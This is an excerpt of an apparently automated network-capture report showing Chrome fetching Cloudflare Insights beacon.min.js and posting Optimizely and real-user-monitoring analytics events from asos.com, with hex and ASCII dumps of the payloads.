                                                                                                                                                                                                                                                                  Host: static.cloudflareinsights.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  Origin: https://a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://a19065870423.cdn.optimizely.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC373INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:36 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 19948
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                  ETag: W/"2024.6.1"
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 06 Jun 2024 15:52:56 GMT
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8da578ed9f433064-DFW
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC996INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 33 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 32 35 36 3b 2b 2b 6e 29 74 5b 6e 5d 3d 28 6e 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 28 31 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 7c 7c 30 2c 69 3d 74 3b 72 65 74 75 72 6e 5b 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b
                                                                                                                                                                                                                                                                  Data Ascii: !function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r+
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC1369INData Raw: 3b 69 66 28 61 5b 36 5d 3d 31 35 26 61 5b 36 5d 7c 36 34 2c 61 5b 38 5d 3d 36 33 26 61 5b 38 5d 7c 31 32 38 2c 74 29 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 31 36 3b 2b 2b 63 29 74 5b 6f 2b 63 5d 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 69 28 61 29 7d 7d 2c 31 36 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 74 68 69 73 26 26 74 68 69 73 2e 5f 5f 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67
                                                                                                                                                                                                                                                                  Data Ascii: ;if(a[6]=15&a[6]|64,a[8]=63&a[8]|128,t)for(var c=0;c<16;++c)t[o+c]=a[c];return t||i(a)}},168:function(e,t,n){"use strict";var r=this&&this.__assign||function(){return r=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var i in t=arg
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC1369INData Raw: 72 63 68 50 61 72 61 6d 73 29 7b 76 61 72 20 79 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 67 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 5e 5c 3f 5d 2b 5c 3f 3f 2f 2c 22 22 29 29 2c 68 3d 79 2e 67 65 74 28 22 74 6f 6b 65 6e 22 29 3b 68 26 26 28 70 2e 74 6f 6b 65 6e 3d 68 29 3b 76 61 72 20 54 3d 79 2e 67 65 74 28 22 73 70 61 22 29 3b 70 2e 73 70 61 3d 6e 75 6c 6c 3d 3d 3d 54 7c 7c 22 74 72 75 65 22 3d 3d 3d 54 7d 7d 70 26 26 22 6d 75 6c 74 69 22 21 3d 3d 70 2e 6c 6f 61 64 26 26 28 70 2e 6c 6f 61 64 3d 22 73 69 6e 67 6c 65 22 29 2c 77 69 6e 64 6f 77 2e 5f 5f 63 66 42 65 61 63 6f 6e 3d 70 7d 69 66 28 73 26 26 70 26 26 70 2e 74 6f 6b 65 6e 29 7b 76 61 72 20 77 2c 53 2c 62 3d 21 31 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74
                                                                                                                                                                                                                                                                  Data Ascii: rchParams){var y=new URLSearchParams(g.replace(/^[^\?]+\??/,"")),h=y.get("token");h&&(p.token=h);var T=y.get("spa");p.spa=null===T||"true"===T}}p&&"multi"!==p.load&&(p.load="single"),window.__cfBeacon=p}if(s&&p&&p.token){var w,S,b=!1;document.addEventList
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC1369INData Raw: 2e 74 69 6d 69 6e 67 73 56 32 3d 7b 7d 2c 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 3d 32 2c 64 2e 64 74 3d 6d 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 2c 64 65 6c 65 74 65 20 64 2e 74 69 6d 69 6e 67 73 2c 74 28 6d 5b 30 5d 2c 64 2e 74 69 6d 69 6e 67 73 56 32 29 29 7d 31 3d 3d 3d 64 2e 76 65 72 73 69 6f 6e 73 2e 74 69 6d 69 6e 67 73 26 26 74 28 63 2c 64 2e 74 69 6d 69 6e 67 73 29 2c 74 28 75 2c 64 2e 6d 65 6d 6f 72 79 29 7d 65 6c 73 65 20 4f 28 64 29 3b 72 65 74 75 72 6e 20 64 2e 66 69 72 73 74 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 70 61 69 6e 74 22 29 2c 64 2e 66 69 72 73 74 43 6f 6e 74 65 6e 74 66 75 6c 50 61 69 6e 74 3d 6b 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 29 2c 70 26 26 28 70 2e 69 63
                                                                                                                                                                                                                                                                  Data Ascii: .timingsV2={},d.versions.timings=2,d.dt=m[0].deliveryType,delete d.timings,t(m[0],d.timingsV2))}1===d.versions.timings&&t(c,d.timings),t(u,d.memory)}else O(d);return d.firstPaint=k("first-paint"),d.firstContentfulPaint=k("first-contentful-paint"),p&&(p.ic
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC1369INData Raw: 65 72 65 64 3a 21 30 7d 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 52 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 52 29 7d 29 29 3b 76 61 72 20 41 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 26 26 30 3d 3d 3d 76 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 69 64 3d 3d 3d 6c 7d 29 29 2e 6c 65 6e 67 74 68 7d 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 2e 70 75 73 68 28 7b 69 64 3a 6c 2c 75 72 6c 3a 65 2c 74 73 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65
                                                                                                                                                                                                                                                                  Data Ascii: ered:!0}};"complete"===window.document.readyState?R():window.addEventListener("load",(function(){window.setTimeout(R)}));var A=function(){return L&&0===v.filter((function(e){return e.id===l})).length},_=function(e){v.push({id:l,url:e,ts:(new Date).getTime
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC1369INData Raw: 72 63 65 4c 6f 61 64 54 69 6d 65 2c 45 2e 6c 63 70 2e 65 72 64 3d 63 2e 65 6c 65 6d 65 6e 74 52 65 6e 64 65 72 44 65 6c 61 79 2c 45 2e 6c 63 70 2e 69 74 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 63 2e 6c 63 70 52 65 73 6f 75 72 63 65 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 69 6e 69 74 69 61 74 6f 72 54 79 70 65 2c 45 2e 6c 63 70 2e 66 70 3d 6e 75 6c 6c 3d 3d 3d 28 61 3d 6e 75 6c 6c 3d 3d 3d 28 6f 3d 63 2e 6c 63 70 45 6e 74 72 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 65 6c 65 6d 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 66 65 74 63 68 70 72 69 6f 72 69 74 79 22 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 49 4e 50 22
                                                                                                                                                                                                                                                                  Data Ascii: rceLoadTime,E.lcp.erd=c.elementRenderDelay,E.lcp.it=null===(i=c.lcpResourceEntry)||void 0===i?void 0:i.initiatorType,E.lcp.fp=null===(a=null===(o=c.lcpEntry)||void 0===o?void 0:o.element)||void 0===a?void 0:a.getAttribute("fetchpriority"));break;case"INP"
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC1369INData Raw: 64 65 64 42 6f 64 79 53 69 7a 65 26 26 28 72 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 3d 6e 5b 30 5d 2e 64 65 63 6f 64 65 64 42 6f 64 79 53 69 7a 65 29 2c 65 2e 64 74 3d 6e 5b 30 5d 2e 64 65 6c 69 76 65 72 79 54 79 70 65 29 2c 74 28 72 2c 65 2e 74 69 6d 69 6e 67 73 56 32 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 76 61 72 20 74 3b 69 66 28 22 66 69 72 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 3d 3d 3d 65 26 26 45 2e 66 63 70 26 26 45 2e 66 63 70 2e 76 61 6c 75 65 29 72 65 74 75 72 6e 20 45 2e 66 63 70 2e 76 61 6c 75 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 73 2e 67 65 74 45 6e 74 72 69
                                                                                                                                                                                                                                                                  Data Ascii: dedBodySize&&(r.decodedBodySize=n[0].decodedBodySize),e.dt=n[0].deliveryType),t(r,e.timingsV2)}}function k(e){var t;if("first-contentful-paint"===e&&E.fcp&&E.fcp.value)return E.fcp.value;if("function"==typeof s.getEntriesByType){var n=null===(t=s.getEntri
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC1369INData Raw: 76 65 6e 74 54 79 70 65 3d 7b 7d 29 29 5b 72 2e 4c 6f 61 64 3d 31 5d 3d 22 4c 6f 61 64 22 2c 72 5b 72 2e 41 64 64 69 74 69 6f 6e 61 6c 3d 32 5d 3d 22 41 64 64 69 74 69 6f 6e 61 6c 22 2c 72 5b 72 2e 57 65 62 56 69 74 61 6c 73 56 32 3d 33 5d 3d 22 57 65 62 56 69 74 61 6c 73 56 32 22 2c 28 6e 3d 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 7c 7c 28 74 2e 46 65 74 63 68 50 72 69 6f 72 69 74 79 3d 7b 7d 29 29 2e 48 69 67 68 3d 22 68 69 67 68 22 2c 6e 2e 4c 6f 77 3d 22 6c 6f 77 22 2c 6e 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 2c 31 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77
                                                                                                                                                                                                                                                                  Data Ascii: ventType={}))[r.Load=1]="Load",r[r.Additional=2]="Additional",r[r.WebVitalsV2=3]="WebVitalsV2",(n=t.FetchPriority||(t.FetchPriority={})).High="high",n.Low="low",n.Auto="auto"},104:function(e,t){!function(e){"use strict";var t,n,r,i,o,a=function(){return w
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC1369INData Raw: 30 3f 72 3d 22 70 72 65 72 65 6e 64 65 72 22 3a 64 6f 63 75 6d 65 6e 74 2e 77 61 73 44 69 73 63 61 72 64 65 64 3f 72 3d 22 72 65 73 74 6f 72 65 22 3a 6e 2e 74 79 70 65 26 26 28 72 3d 6e 2e 74 79 70 65 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2d 22 29 29 29 2c 7b 6e 61 6d 65 3a 65 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 3d 3d 3d 74 3f 2d 31 3a 74 2c 72 61 74 69 6e 67 3a 22 67 6f 6f 64 22 2c 64 65 6c 74 61 3a 30 2c 65 6e 74 72 69 65 73 3a 5b 5d 2c 69 64 3a 22 76 33 2d 22 2e 63 6f 6e 63 61 74 28 44 61 74 65 2e 6e 6f 77 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 38 39 39 39 39 39 39 39 39 39 39 39 39 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2b 31 65 31 32 29 2c 6e 61 76 69 67 61 74 69 6f 6e 54 79 70 65 3a 72 7d 7d 2c
                                                                                                                                                                                                                                                                  Data Ascii: 0?r="prerender":document.wasDiscarded?r="restore":n.type&&(r=n.type.replace(/_/g,"-"))),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:"v3-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:r}},
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 72 65 72 65 6e 64 65 72 69 6e 67 63 68 61 6e 67 65 22 2c 62 2c 21 30 29 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 3c 30 26 26 28 77 3d 53 28 29 2c 45 28 29 2c 6c 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 3d 53 28 29 2c 45 28 29 7d 29 2c 30 29 7d 29 29 29 2c 7b 67 65 74 20 66 69 72 73 74 48 69 64 64 65 6e 54 69 6d 65 28 29 7b 72 65 74 75 72 6e 20 77 7d 7d 7d 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 6f 63 75 6d 65 6e 74 2e 70
                                                                                                                                                                                                                                                                  Data Ascii: function(){removeEventListener("visibilitychange",b,!0),removeEventListener("prerenderingchange",b,!0)},C=function(){return w<0&&(w=S(),E(),l((function(){setTimeout((function(){w=S(),E()}),0)}))),{get firstHiddenTime(){return w}}},P=function(e){document.p


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  130192.168.2.164996634.49.241.1894437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC613OUTPOST /v1/events HTTP/1.1
                                                                                                                                                                                                                                                                  Host: logx.optimizely.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 1169
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.asos.com
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC1169OUTData Raw: 7b 22 61 63 63 6f 75 6e 74 5f 69 64 22 3a 22 31 39 30 36 35 38 37 30 34 32 33 22 2c 22 61 6e 6f 6e 79 6d 69 7a 65 5f 69 70 22 3a 74 72 75 65 2c 22 63 6c 69 65 6e 74 5f 6e 61 6d 65 22 3a 22 6a 73 22 2c 22 63 6c 69 65 6e 74 5f 76 65 72 73 69 6f 6e 22 3a 22 30 2e 32 31 34 2e 30 22 2c 22 65 6e 72 69 63 68 5f 64 65 63 69 73 69 6f 6e 73 22 3a 74 72 75 65 2c 22 70 72 6f 6a 65 63 74 5f 69 64 22 3a 22 31 39 31 38 31 35 35 32 35 35 32 22 2c 22 72 65 76 69 73 69 6f 6e 22 3a 22 37 33 30 30 31 22 2c 22 76 69 73 69 74 6f 72 73 22 3a 5b 7b 22 76 69 73 69 74 6f 72 5f 69 64 22 3a 22 39 64 35 39 64 32 34 64 2d 62 35 63 31 2d 34 61 39 38 2d 38 34 65 31 2d 63 61 31 33 38 61 62 36 38 32 65 34 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 41 55 54 4f 22 2c 22 61 74 74 72 69
                                                                                                                                                                                                                                                                  Data Ascii: {"account_id":"19065870423","anonymize_ip":true,"client_name":"js","client_version":"0.214.0","enrich_decisions":true,"project_id":"19181552552","revision":"73001","visitors":[{"visitor_id":"9d59d24d-b5c1-4a98-84e1-ca138ab682e4","session_id":"AUTO","attri
                                                                                                                                                                                                                                                                  2024-10-29 19:11:36 UTC595INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                                                  access-control-allow-credentials: true
                                                                                                                                                                                                                                                                  access-control-allow-origin: https://www.asos.com
                                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With,Content-Type,Accept,Origin,X-App-Trace-Id,X-Optimizely-Strict
                                                                                                                                                                                                                                                                  access-control-allow-methods: POST,OPTIONS
                                                                                                                                                                                                                                                                  access-control-expose-headers: X-Requested-With,Content-Type,Accept,Origin,X-App-Trace-Id
                                                                                                                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                                                                                                                  X-Request-Id: 5f69e2db-cef2-46d2-b467-10b02d4033e2
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:36 GMT
                                                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  131192.168.2.1649973104.18.66.574437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC691OUTPOST /cdn-cgi/rum? HTTP/1.1
                                                                                                                                                                                                                                                                  Host: a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 1643
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  content-type: application/json
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://a19065870423.cdn.optimizely.com/client_storage/a19065870423.html
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC1643OUTData Raw: 7b 22 6d 65 6d 6f 72 79 22 3a 7b 22 74 6f 74 61 6c 4a 53 48 65 61 70 53 69 7a 65 22 3a 33 33 36 31 31 37 35 2c 22 75 73 65 64 4a 53 48 65 61 70 53 69 7a 65 22 3a 32 35 32 34 37 31 31 2c 22 6a 73 48 65 61 70 53 69 7a 65 4c 69 6d 69 74 22 3a 32 31 37 32 36 34 39 34 37 32 7d 2c 22 72 65 73 6f 75 72 63 65 73 22 3a 5b 5d 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 73 6f 73 2e 63 6f 6d 2f 22 2c 22 65 76 65 6e 74 54 79 70 65 22 3a 31 2c 22 66 69 72 73 74 50 61 69 6e 74 22 3a 30 2c 22 66 69 72 73 74 43 6f 6e 74 65 6e 74 66 75 6c 50 61 69 6e 74 22 3a 30 2c 22 73 74 61 72 74 54 69 6d 65 22 3a 31 37 33 30 32 32 39 30 39 33 38 36 36 2e 38 2c 22 76 65 72 73 69 6f 6e 73 22 3a 7b 22 66 6c 22 3a 22 32 30 32 34 2e 31 30 2e 34 22 2c 22 6a
                                                                                                                                                                                                                                                                  Data Ascii: {"memory":{"totalJSHeapSize":3361175,"usedJSHeapSize":2524711,"jsHeapSizeLimit":2172649472},"resources":[],"referrer":"https://www.asos.com/","eventType":1,"firstPaint":0,"firstContentfulPaint":0,"startTime":1730229093866.8,"versions":{"fl":"2024.10.4","j
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC388INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:37 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  access-control-allow-origin: https://a19065870423.cdn.optimizely.com
                                                                                                                                                                                                                                                                  access-control-allow-methods: POST,OPTIONS
                                                                                                                                                                                                                                                                  access-control-max-age: 86400
                                                                                                                                                                                                                                                                  vary: Origin
                                                                                                                                                                                                                                                                  access-control-allow-credentials: true
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8da578f35a636c28-DFW
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  132192.168.2.1649972104.16.80.734437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC413OUTGET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: static.cloudflareinsights.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC373INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:37 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 19948
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                  ETag: W/"2024.6.1"
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 06 Jun 2024 15:52:56 GMT
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8da578f35dbb6b3d-DFW
                                                                                                                                                                                                                                                                  2024-10-29 19:11:37 UTC996INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 33 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 32 35 36 3b 2b 2b 6e 29 74 5b 6e 5d 3d 28 6e 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 28 31 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 7c 7c 30 2c 69 3d 74 3b 72 65 74 75 72 6e 5b 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b
